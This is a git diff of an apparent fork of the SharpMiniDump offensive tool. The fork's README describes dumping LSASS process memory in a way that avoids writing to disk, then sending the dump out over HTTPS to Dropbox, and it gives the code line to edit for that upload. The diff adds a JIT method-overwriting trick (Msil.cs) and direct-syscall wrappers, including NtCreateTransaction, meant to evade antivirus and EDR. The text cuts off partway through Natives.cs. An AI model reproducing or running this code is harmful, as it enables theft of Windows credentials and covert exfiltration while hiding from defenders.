diff --git a/README.md b/README.md index bbcae26..d3628c9 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,12 @@ # SharpMiniDump -Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses: dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection. +Implementation of b4rtiks's [SharpMiniDump](https://github.com/b4rtik/SharpMiniDump) using NTFS transactions to avoid writting the minidump to disk and exfiltrating it via HTTPS using sockets. As a POC, dropbox is used to exfiltrate the data but this can me easily modified. -SharpMiniDump is a rough port of this project [Dumpert](https://github.com/outflanknl/Dumpert) by [@Cn33liz](https://twitter.com/Cneelis) and you will find the detail in this [post](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/), so BIG credits to him. +If you wish to use dropbox, just change the following parameters at Program.cs:201 and you are good to go. -Other credits go to [@cobbr_io](https://twitter.com/cobbr_io) and [@TheRealWover](https://twitter.com/TheRealWover) for their work on [SharpSploit](https://github.com/cobbr/SharpSploit) (Execution / DynamicInvoke) +```C# +SslTcpClient.RunClient("content.dropboxapi.com", "", "", b64); +``` diff --git a/SharpMiniDump/CustomLoadLibrary.cs b/SharpMiniDump/CustomLoadLibrary.cs index 374accb..687fb70 100644 --- a/SharpMiniDump/CustomLoadLibrary.cs +++ b/SharpMiniDump/CustomLoadLibrary.cs @@ -1,28 +1,12 @@ -// -// Author: B4rtik (@b4rtik) -// Project: RedPeanut (https://github.com/b4rtik/RedPeanut) -// License: BSD 3-Clause -// - -using System; -using System.Collections.Generic; +using System; using System.Diagnostics; using System.IO; -using System.Linq; using System.Runtime.InteropServices; -using System.Security.Cryptography; -using System.Text; namespace SharpMiniDump { public class CustomLoadLibrary - { - /// - /// Resolves LdrLoadDll and uses that function to load a DLL from disk. - /// - /// Ruben Boonen (@FuzzySec) - /// The path to the DLL on disk. Uses the LoadLibrary convention. - /// IntPtr base address of the loaded module or IntPtr.Zero if the module was not loaded successfully. + { public static IntPtr LoadModuleFromDisk(string DLLPath) { Natives.UNICODE_STRING uModuleName = new Natives.UNICODE_STRING(); @@ -56,40 +40,7 @@ public static IntPtr GetDllAddress(string DLLName, bool CanLoadFromDisk = false) return hModule; } - - /// - /// Helper for getting the pointer to a function from a DLL loaded by the process. - /// - /// Ruben Boonen (@FuzzySec) - /// The name of the DLL (e.g. "ntdll.dll" or "C:\Windows\System32\ntdll.dll"). - /// Name of the exported procedure. - /// Optional, indicates if the function can try to load the DLL from disk if it is not found in the loaded module list. - /// IntPtr for the desired function. - public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) - { - IntPtr hModule = GetLoadedModuleAddress(DLLName); - if (hModule == IntPtr.Zero && CanLoadFromDisk) - { - hModule = LoadModuleFromDisk(DLLName); - if (hModule == IntPtr.Zero) - { - throw new FileNotFoundException(DLLName + ", unable to find the specified file."); - } - } - else if (hModule == IntPtr.Zero) - { - throw new DllNotFoundException(DLLName + ", Dll was not found."); - } - - return GetExportAddress(hModule, FunctionName); - } - - /// - /// Helper for getting the base address of a module loaded by the current process. This base address could be passed to GetProcAddress/LdrGetProcedureAddress or it could be used for manual export parsing. - /// - /// Ruben Boonen (@FuzzySec) - /// The name of the DLL (e.g. "ntdll.dll"). - /// IntPtr base address of the loaded module or IntPtr.Zero if the module is not found. + public static IntPtr GetLoadedModuleAddress(string DLLName) { ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; @@ -103,13 +54,7 @@ public static IntPtr GetLoadedModuleAddress(string DLLName) return IntPtr.Zero; } - /// - /// Given a module base address, resolve the address of a function by manually walking the module export table. - /// - /// Ruben Boonen (@FuzzySec) - /// A pointer to the base address where the module is loaded in the current process. - /// The name of the export to search for (e.g. "NtAlertResumeThread"). - /// IntPtr for the desired function. + public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) { IntPtr FunctionPtr = IntPtr.Zero; diff --git a/SharpMiniDump/Msil.cs b/SharpMiniDump/Msil.cs new file mode 100644 index 0000000..d7905e5 --- /dev/null +++ b/SharpMiniDump/Msil.cs @@ -0,0 +1,191 @@ +using System; +using System.Runtime.InteropServices; +using System.Reflection.Emit; +using System.Reflection; +using System.Security; + +namespace SharpMiniDump +{ + class msil + { + public unsafe static IntPtr getAdrressWithMSIL(byte[] syscall) + { + //begin memcopy en msil + AppDomain appD = AppDomain.CurrentDomain; + AssemblyName assName = new AssemblyName("MethodSmasher"); + AssemblyBuilder assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); + AllowPartiallyTrustedCallersAttribute attr = new AllowPartiallyTrustedCallersAttribute(); + ConstructorInfo csInfo = attr.GetType().GetConstructors()[0]; + object[] obArray = new object[0]; + CustomAttributeBuilder cAttrB = new CustomAttributeBuilder(csInfo, obArray); + assBuilder.SetCustomAttribute(cAttrB); + ModuleBuilder mBuilder = assBuilder.DefineDynamicModule("MethodSmasher"); + UnverifiableCodeAttribute codAttr = new UnverifiableCodeAttribute(); + csInfo = codAttr.GetType().GetConstructors()[0]; + CustomAttributeBuilder modCAttrB = new CustomAttributeBuilder(csInfo, obArray); + mBuilder.SetCustomAttribute(modCAttrB); + TypeBuilder tBuilder = mBuilder.DefineType("MethodSmasher", TypeAttributes.Public); + Type[] allParams = { typeof(IntPtr), typeof(IntPtr), typeof(Int32) }; + MethodBuilder methodBuilder = tBuilder.DefineMethod("OverwriteMethod", MethodAttributes.Public | MethodAttributes.Static, null, allParams); + ILGenerator generator = methodBuilder.GetILGenerator(); + + generator.Emit(OpCodes.Ldarg_0); + generator.Emit(OpCodes.Ldarg_1); + generator.Emit(OpCodes.Ldarg_2); + generator.Emit(OpCodes.Volatile); + generator.Emit(OpCodes.Cpblk); + generator.Emit(OpCodes.Ret); + + var smasherType = tBuilder.CreateType(); + var overWriteMethod = smasherType.GetMethod("OverwriteMethod"); + //end memcopy en msil + + //begin xor dummy method + appD = AppDomain.CurrentDomain; + assName = new AssemblyName("SmashMe"); + assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); + attr = new AllowPartiallyTrustedCallersAttribute(); + csInfo = attr.GetType().GetConstructors()[0]; + obArray = new object[0]; + cAttrB = new CustomAttributeBuilder(csInfo, obArray); + assBuilder.SetCustomAttribute(cAttrB); + mBuilder = assBuilder.DefineDynamicModule("SmashMe"); + codAttr = new UnverifiableCodeAttribute(); + csInfo = codAttr.GetType().GetConstructors()[0]; + modCAttrB = new CustomAttributeBuilder(csInfo, obArray); + mBuilder.SetCustomAttribute(modCAttrB); + tBuilder = mBuilder.DefineType("SmashMe", TypeAttributes.Public); + Int32 xorK = 0x41424344; + Type[] allParams2 = { typeof(Int32) }; + methodBuilder = tBuilder.DefineMethod("OverwriteMe", MethodAttributes.Public | MethodAttributes.Static, typeof(Int32), allParams2); + generator = methodBuilder.GetILGenerator(); + generator.DeclareLocal(typeof(Int32)); + generator.Emit(OpCodes.Ldarg_0); + + for (var x = 0; x < 13000; x++) + { + generator.Emit(OpCodes.Ldc_I4, xorK); + generator.Emit(OpCodes.Xor); + generator.Emit(OpCodes.Stloc_0); + generator.Emit(OpCodes.Ldloc_0); + } + + generator.Emit(OpCodes.Ldc_I4, xorK); + generator.Emit(OpCodes.Xor); + generator.Emit(OpCodes.Ret); + + var smashmeType = tBuilder.CreateType(); + var overwriteMeMethod = smashmeType.GetMethod("OverwriteMe"); + //end xor dummy method + + //jit the xor method + for (var x = 0; x < 40; x++) + { + try + { + var i = overwriteMeMethod.Invoke(null, new object[] { 0x11112222 }); + } + catch (Exception e) + { + if (e.InnerException != null) + { + string err = e.InnerException.Message; + } + } + } + + byte[] trap; + + + if (IntPtr.Size == 4) + { + //32bits shcode + trap = new byte[] { 0x90 }; + } + else + { + //64bits shcode + trap = new byte[] { 0x90 }; + } + + byte[] finalShellcode = new byte[trap.Length + syscall.Length]; + Buffer.BlockCopy(trap, 0, finalShellcode, 0, trap.Length); + Buffer.BlockCopy(syscall, 0, finalShellcode, trap.Length, syscall.Length); + + IntPtr shellcodeAddress = Marshal.AllocHGlobal(finalShellcode.Length); + + Marshal.Copy(finalShellcode, 0, shellcodeAddress, finalShellcode.Length); + + IntPtr targetMethodAddress = getMethodAddress(overwriteMeMethod); + + object[] owParams = new object[] { targetMethodAddress, shellcodeAddress, finalShellcode.Length }; + try + { + overWriteMethod.Invoke(null, owParams); + } + catch (Exception e) + { + if (e.InnerException != null) + { + string err = e.InnerException.Message; + } + } + + return targetMethodAddress; + } + + public static IntPtr getMethodAddress(MethodInfo minfo) + { + + IntPtr retAd = new IntPtr(); + Type typeBuilded; + + if (minfo.GetMethodImplementationFlags() == MethodImplAttributes.InternalCall) + { + return IntPtr.Zero; + } + + try + { + typeBuilded = Type.GetType("MethodLeaker", true); + } + catch + { + AppDomain appD = AppDomain.CurrentDomain; + AssemblyName assName = new AssemblyName("MethodLeakAssembly"); + AssemblyBuilder assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); + ModuleBuilder mBuilder = assBuilder.DefineDynamicModule("MethodLeakModule"); + TypeBuilder tBuilder = mBuilder.DefineType("MethodLeaker", TypeAttributes.Public); + + MethodBuilder metBuilder; + if (IntPtr.Size == 4) + { + metBuilder = tBuilder.DefineMethod("LeakMethod", MethodAttributes.Public | MethodAttributes.Static, typeof(IntPtr), null); + + } + else + { + metBuilder = tBuilder.DefineMethod("LeakMethod", MethodAttributes.Public | MethodAttributes.Static, typeof(IntPtr), null); + } + + ILGenerator ilGen = metBuilder.GetILGenerator(); + + ilGen.Emit(OpCodes.Ldftn, minfo); + ilGen.Emit(OpCodes.Ret); + + typeBuilded = tBuilder.CreateType(); + } + MethodInfo methodInfoBuilded = typeBuilded.GetMethod("LeakMethod"); + try + { + var obj = methodInfoBuilded.Invoke(null, null); + retAd = (IntPtr)obj; + } + catch (Exception e) + { + Console.WriteLine(methodInfoBuilded.Name + " cannot return an unmanaged address."); + } + return retAd; + } + } +} diff --git a/SharpMiniDump/NativeSysCall.cs b/SharpMiniDump/NativeSysCall.cs index 21acce7..9ad3bcb 100644 --- a/SharpMiniDump/NativeSysCall.cs +++ b/SharpMiniDump/NativeSysCall.cs @@ -1,12 +1,4 @@ -// -// Author: B4rtik (@b4rtik) -// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump) -// License: BSD 3-Clause -// - -using System; -using System.ComponentModel; -using System.Diagnostics; +using System; using System.Runtime.InteropServices; using System.Security; using static SharpMiniDump.Natives; @@ -37,250 +29,95 @@ class NativeSysCall static byte[] bZwProtectVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x50, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x36 + /// 3: b8 0f 00 00 00 mov eax,0x55 /// 8: 0f 05 syscall /// a: c3 ret - static byte[] bZwQuerySystemInformation10 = { 0x49, 0x89, 0xCA, 0xB8, 0x36, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + static byte[] bNtCreateFile10 = { 0x49, 0x89, 0xCA, 0xB8, 0x55, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; - /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x18 - /// 8: 0f 05 syscall - /// a: c3 ret + ///0: 49 89 ca mov r10,rcx + ///3: b8 26 00 00 00 mov eax,0x26 + ///8: 0f 05 syscall + ///a: c3 ret - static byte[] bNtAllocateVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x18, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + static byte[] bZwOpenProcess10 = { 0x49, 0x89, 0xCA, 0xB8, 0x26, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x1E + /// 3: b8 0f 00 00 00 mov eax,0xC6 /// 8: 0f 05 syscall /// a: c3 ret - static byte[] bNtFreeVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x1E, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + static byte[] bNtCreateTransaction10 = { 0x49, 0x89, 0xCA, 0xB8, 0xC6, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; - /// 0: 49 89 ca mov r10,rcx - /// 3: b8 0f 00 00 00 mov eax,0x55 - /// 8: 0f 05 syscall - /// a: c3 ret + public static NTSTATUS NtCreateTransaction10(out IntPtr tHandle, int desiredAccess, IntPtr objAttr, IntPtr Uow, IntPtr TmHandle, ulong createOptions, ulong isolationLevel, ulong isolationFlags, IntPtr Timeout, IntPtr Description) + { + byte[] syscall = bNtCreateTransaction10; - static byte[] bNtCreateFile10 = { 0x49, 0x89, 0xCA, 0xB8, 0x55, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); - ///0: 49 89 ca mov r10,rcx - ///3: b8 26 00 00 00 mov eax,0x26 - ///8: 0f 05 syscall - ///a: c3 ret + Delegates.NtCreateTransaction myAssemblyFunction = (Delegates.NtCreateTransaction)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateTransaction)); - static byte[] bZwOpenProcess10 = { 0x49, 0x89, 0xCA, 0xB8, 0x26, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 }; + return (NTSTATUS)myAssemblyFunction(out tHandle, desiredAccess, objAttr, Uow, TmHandle, createOptions, isolationLevel, isolationFlags, Timeout, Description); + } public static NTSTATUS ZwOpenProcess10(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid) { byte[] syscall = bZwOpenProcess10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwOpenProcess myAssemblyFunction = (Delegates.ZwOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwOpenProcess)); + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); + + Delegates.ZwOpenProcess myAssemblyFunction = (Delegates.ZwOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwOpenProcess)); - return (NTSTATUS)myAssemblyFunction(out hProcess, processAccess, objAttribute, ref clientid); - } - } + return (NTSTATUS)myAssemblyFunction(out hProcess, processAccess, objAttribute, ref clientid); + } public static NTSTATUS ZwClose10(IntPtr handle) { byte[] syscall = bZwClose10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect( memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwClose myAssemblyFunction = (Delegates.ZwClose)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwClose)); + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); + + Delegates.ZwClose myAssemblyFunction = (Delegates.ZwClose)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwClose)); - return (NTSTATUS)myAssemblyFunction(handle); - } - } + return (NTSTATUS)myAssemblyFunction(handle); + } - + public static NTSTATUS ZwWriteVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten) { byte[] syscall = bZwWriteVirtualMemory10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect( memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwWriteVirtualMemory myAssemblyFunction = (Delegates.ZwWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwWriteVirtualMemory)); + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); + + Delegates.ZwWriteVirtualMemory myAssemblyFunction = (Delegates.ZwWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwWriteVirtualMemory)); - return (NTSTATUS)myAssemblyFunction(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten); - } - } + return (NTSTATUS)myAssemblyFunction(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten); + } public static NTSTATUS ZwProtectVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten) { byte[] syscall = bZwProtectVirtualMemory10; - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.ZwProtectVirtualMemory myAssemblyFunction = (Delegates.ZwProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwProtectVirtualMemory)); - - return (NTSTATUS)myAssemblyFunction(hProcess, ref lpBaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten); - } - } - } - - public static NTSTATUS ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength) - { - byte[] syscall = bZwQuerySystemInformation10; - - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); - Delegates.ZwQuerySystemInformation myAssemblyFunction = (Delegates.ZwQuerySystemInformation)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwQuerySystemInformation)); + Delegates.ZwProtectVirtualMemory myAssemblyFunction = (Delegates.ZwProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwProtectVirtualMemory)); - return (NTSTATUS)myAssemblyFunction(SystemInformationClass, SystemInformation, SystemInformationLength, ref ReturnLength); - } - } - } - - public static NTSTATUS NtAllocateVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect) - { - byte[] syscall = bNtAllocateVirtualMemory10; - - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.NtAllocateVirtualMemory myAssemblyFunction = (Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtAllocateVirtualMemory)); - - return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect); - } - } + return (NTSTATUS)myAssemblyFunction(hProcess, ref lpBaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten); + } - public static NTSTATUS NtFreeVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType) + public static NTSTATUS NtCreateFile10(out IntPtr fileHandle, Int32 desiredAccess, ref OBJECT_ATTRIBUTES objectAttributes, out IO_STATUS_BLOCK ioStatusBlock, ref Int64 allocationSize, UInt32 fileAttributes, System.IO.FileShare shareAccess, UInt32 createDisposition, UInt32 createOptions, IntPtr eaBuffer, UInt32 eaLength) { - byte[] syscall = bNtFreeVirtualMemory10; - - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.NtFreeVirtualMemory myAssemblyFunction = (Delegates.NtFreeVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtFreeVirtualMemory)); + byte[] syscall = bNtCreateFile10; - return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ref RegionSize, FreeType); - } - } - } + IntPtr memoryAddress = msil.getAdrressWithMSIL(syscall); - public static NTSTATUS NtCreateFile10(out Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle, - Int32 desiredAccess, - ref OBJECT_ATTRIBUTES objectAttributes, - out IO_STATUS_BLOCK ioStatusBlock, - ref Int64 allocationSize, - UInt32 fileAttributes, - System.IO.FileShare shareAccess, - UInt32 createDisposition, - UInt32 createOptions, - IntPtr eaBuffer, - UInt32 eaLength) - { - byte[] syscall = bNtCreateFile10; + Delegates.NtCreateFile myAssemblyFunction = (Delegates.NtCreateFile)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateFile)); - unsafe - { - fixed (byte* ptr = syscall) - { - - IntPtr memoryAddress = (IntPtr)ptr; - - if (!Natives.VirtualProtect(memoryAddress, - (UIntPtr)syscall.Length, 0x40, out uint oldprotect)) - { - throw new Win32Exception(); - } - - Delegates.NtCreateFile myAssemblyFunction = (Delegates.NtCreateFile)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateFile)); - - return (NTSTATUS)myAssemblyFunction(out fileHandle, - desiredAccess, - ref objectAttributes, - out ioStatusBlock, - ref allocationSize, - fileAttributes, - shareAccess, - createDisposition, - createOptions, - eaBuffer, - eaLength); - } - } + return (NTSTATUS)myAssemblyFunction(out fileHandle, desiredAccess,ref objectAttributes,out ioStatusBlock,ref allocationSize, fileAttributes, shareAccess, createDisposition, createOptions, eaBuffer, eaLength); + } public struct Delegates @@ -291,45 +128,23 @@ public struct Delegates [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwClose(IntPtr handle); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten); + public delegate int NtCreateTransaction(out IntPtr tHandle, int desiredAccess, IntPtr objAttr, IntPtr Uow, IntPtr TmHandle, ulong createOptions, ulong isolationLevel, ulong isolationFlags, IntPtr Timeout, IntPtr Description); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwProtectVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect); + public delegate int ZwClose(IntPtr handle); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType); + public delegate int ZwWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int NtCreateFile(out Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle, - Int32 desiredAccess, - ref OBJECT_ATTRIBUTES objectAttributes, - out IO_STATUS_BLOCK ioStatusBlock, - ref Int64 allocationSize, - UInt32 fileAttributes, - System.IO.FileShare shareAccess, - UInt32 createDisposition, - UInt32 createOptions, - IntPtr eaBuffer, - UInt32 eaLength); + public delegate int ZwProtectVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool RtlEqualUnicodeString(UNICODE_STRING String1, UNICODE_STRING String2, bool CaseInSensitive); + public delegate int NtCreateFile(out IntPtr fileHandle, Int32 desiredAccess, ref OBJECT_ATTRIBUTES objectAttributes, out IO_STATUS_BLOCK ioStatusBlock, ref Int64 allocationSize, UInt32 fileAttributes, System.IO.FileShare shareAccess, UInt32 createDisposition, UInt32 createOptions, IntPtr eaBuffer, UInt32 eaLength); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] @@ -341,33 +156,19 @@ public delegate int NtCreateFile(out Microsoft.Win32.SafeHandles.SafeFileHandle [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); - - + public delegate bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); + [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] public delegate bool OpenProcessToken(IntPtr hProcess, UInt32 dwDesiredAccess, out IntPtr hToken); [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate int LdrLoadDll(IntPtr PathToFile, - UInt32 dwFlags, - ref Natives.UNICODE_STRING ModuleFileName, - ref IntPtr ModuleHandle); - - + public delegate int LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Natives.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle); + [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] public delegate int NtFilterToken(IntPtr TokenHandle, uint Flags, IntPtr SidsToDisable, IntPtr PrivilegesToDelete, IntPtr RestrictedSids, ref IntPtr hToken); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool RevertToSelf(); - - [SuppressUnmanagedCodeSecurity] - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate Boolean ImpersonateLoggedOnUser(IntPtr hToken); - [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] @@ -408,9 +209,6 @@ public delegate int LdrLoadDll(IntPtr PathToFile, [SuppressUnmanagedCodeSecurity] [UnmanagedFunctionPointer(CallingConvention.Cdecl)] public delegate int PssCaptureSnapshot(IntPtr ProcessHandle, PSS_CAPTURE_FLAGS CaptureFlags, int ThreadContextFlags, ref IntPtr SnapshotHandle); - - [UnmanagedFunctionPointer(CallingConvention.Cdecl)] - public delegate bool MyMiniDumpWriteDumpCallback(IntPtr CallbackParam, IntPtr CallbackInput, IntPtr CallbackOutput); } } } diff --git a/SharpMiniDump/Natives.cs b/SharpMiniDump/Natives.cs index 02fb9e7..e6ae7c8 100644 --- a/SharpMiniDump/Natives.cs +++ b/SharpMiniDump/Natives.cs @@ -1,41 +1,25 @@ -// -// Author: B4rtik (@b4rtik) -// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump) -// License: BSD 3-Clause -// - -using System; +using System; using System.Runtime.InteropServices; namespace SharpMiniDump { class Natives { + public const int FILE_MAP_READ = 0x0004; public const int FILE_READ_DATA = 0x0001; // file & pipe - public const int FILE_LIST_DIRECTORY = 0x0001; // directory public const int FILE_WRITE_DATA = 0x0002; // file & pipe - public const int FILE_ADD_FILE = 0x0002; // directory public const int FILE_APPEND_DATA = 0x0004; // file - public const int FILE_ADD_SUBDIRECTORY = 0x0004; // directory - public const int FILE_CREATE_PIPE_INSTANCE = 0x0004; // named pipe public const int FILE_READ_EA = 0x0008; // file & directory public const int FILE_WRITE_EA = 0x0010; // file & directory - public const int FILE_EXECUTE = 0x0020; // file - public const int FILE_TRAVERSE = 0x0020; // directory - public const int FILE_DELETE_CHILD = 0x0040; // directory public const int FILE_READ_ATTRIBUTES = 0x0080; // all public const int FILE_WRITE_ATTRIBUTES = 0x0100; // all public const int FILE_OVERWRITE_IF = 0x00000005; public const int FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020; + public const int MAXIMUM_ALLOWED = 0x02000000; public const long READ_CONTROL = 0x00020000; public const long SYNCHRONIZE = 0x00100000; public const long STANDARD_RIGHTS_WRITE = READ_CONTROL; - public const long STANDARD_RIGHTS_EXECUTE = READ_CONTROL; - public const long STANDARD_RIGHTS_ALL = 0x001F0000; - - public const long SPECIFIC_RIGHTS_ALL = 0x0000FFFF; - public const long FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF; public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000; public const UInt32 STANDARD_RIGHTS_READ = 0x00020000; @@ -48,12 +32,10 @@ class Natives public const 